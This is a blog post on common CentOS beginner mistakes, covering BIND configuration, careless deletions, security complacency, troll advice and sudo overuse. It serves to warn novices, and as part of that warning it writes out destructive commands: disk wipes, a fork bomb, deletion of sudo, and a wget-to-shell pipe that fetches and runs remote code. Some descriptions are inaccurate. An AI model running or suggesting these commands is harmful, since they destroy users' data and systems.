The Five Most Common Rookie Mistakes In CentOS, And How To Avoid Them

Share This Post...Share on FacebookShare on Google+Tweet about this on Twitter

Common Mistakes In CentOSNobody’s perfect. And in the world of network and server administration, mistakes tend to be all-too-common – especially when you’re into your third night of troubleshooting hopped up on enough caffeine to put a Starbucks franchise out of business. Of course, there are some mistakes not even a sleep-deprived, overworked sysadmin will make; novice errors that no one in their right mind would fall victim to.

You haven’t bumbled into any of these, right?

Stuck in a BIND

BIND configuration tends to be one of the biggest sticking points for CentOS first-timers, zone and configuration files in particular. Thing is, even a small mistake can completely bork your system. That’s why you always need to keep the following in mind (via Linuxtopia):

  • Increment the serial number when editing a zone file. Otherwise, nameservers will not refresh the data associated with that zone, even if the master server has the correct information.
  • Watch your ellipses and semicolons.
  • Don’t forget to place periods after FQDNs in zone files, and omit them on hostnames. If there’s no period after a fully qualified domain name, it won’t be recognized as such.
  • If you’re seeing connections blocked by your firewall that shouldn’t be, edit the named configuration file to use port 53 with the command query-source address * port 53;

The Accidental Nuke

As a general rule, you need to be very, very careful when using the command line in Linux. Otherwise, you might end up doing what Vivek Gite did, and accidentally nuke your entire server. See, he wanted to remove a user account from his home directory, but didn’t realize that the previous sysadmin had configured /etc/deluser.conf to remove the entire directory instead.

The lesson here? Familiarize yourself with your configuration files before you start entering commands that call them. Especially if you’re managing a server that used to be someone else’s domain.

Sophistic Security

Everybody knows that there are more viruses for Windows than for any other operating system, right? I mean, who even bothers coding viruses for Linux – aren’t the people who use it tech savvy enough that it’s a lost cause? Maybe.

Or maybe that sort of thinking is dangerous, and lulls you into a false sense of security. I’m sure you all remember what happened with Mac Defender, right? Mac OS users thought they were safe from viruses, too. Look how well that turned out.

Fact is, your system is only as secure as you make it – and that’s true whether you use Linux, Windows, Mac OS X, or Haiku.

Trust In Trolls

The Linux community is pretty fantastic, and there are plenty of passionate, helpful individuals who are all too happy to assist a rookie with finding their way around the OS. Like any community, though, there are trolls – elitists and troublemakers who feel it’s their mission to mess with newcomers. Most commonly, they’ll respond to a harmless request for information with a bogus command which more often than not will leave the newbie much worse off than they would have been without asking for help.

 

With that in mind…don’t ever, under any circumstances, run any of the following commands (unless, of course, you need to):

 

  • rm -rf: Recursive deletion. Wipes the root directory of your operating system.
  • mkfs.ext3 /dev/hda: Formats your hard drive.

 

    • command > /dev/hda : Overwrites your hard drive with raw data, rendering it an overly-expensive paperweight.

 

  • dd if=/dev/zero of=/dev/hda: Wipes your hard drive clean.
  • mv / /dev/null: Moves your system’s root directory into the /dev/null/ file, which discards all data written to it. Basically, it’s a digital black hole.
  • dd if=/dev/random of=/dev/port
    echo 1 > /proc/sys/kernel/panic
    cat /dev/port
    cat /dev/zero > /dev/mem: These lovely lines of code together force your operating system into a kernel panic. If you’re not sure what it is, think of it as Linux’s version of the Blue Screen of Death.
  • :(){:|:&};:: The infamous Fork Bomb sends your system into an infinite loop by spawning two processes, which themselves spawn two processes, and so on until everything grinds to a halt.
  • wget http://an-untrusted-url -O- | sh: The wget command is actually a really useful one…unless it appears like this. By entering the wget command into your console followed by an unknown url, you’re potentially opening your system up to all manner of malware.
  • rm -f /usr/bin/sudo;rm -f /bin/su: Disables sudo and su. Effectively makes it impossible for you to run root commands, neutering your operating system in the process.

 

Sudon’t

Linux can get a little frustrating sometimes, as certain commands have the aggravating tendency to return a ‘permission denied’ error, forcing you to re-type them with ‘sudo’ affixed to the front. It can thus be tempting to preface every single command you type with sudo. Not only is this a waste of time, it makes you look like a complete noob when you do it. See, there are actually certain commands that don’t work so well if you sudo them, to say nothing of the security risks involved with running every command as root.

 

So, there you have it. A few of the most common mistakes, misconceptions, and oversights made by novice sysadmins. And now, I’ll ask again – have you ever fallen victim to any of these?

Image: Flickr/Kyle May

Comments are closed.

get in touch Get in touch with us

Questions? Concerns? Comments? We want to hear from you! Drop us a line with whatever is on your mind and we will get back to you ASAP!!

CONTACT US NOW!

JOIN OUR NEWSLETTER

Signup to be the first to know about new products and services!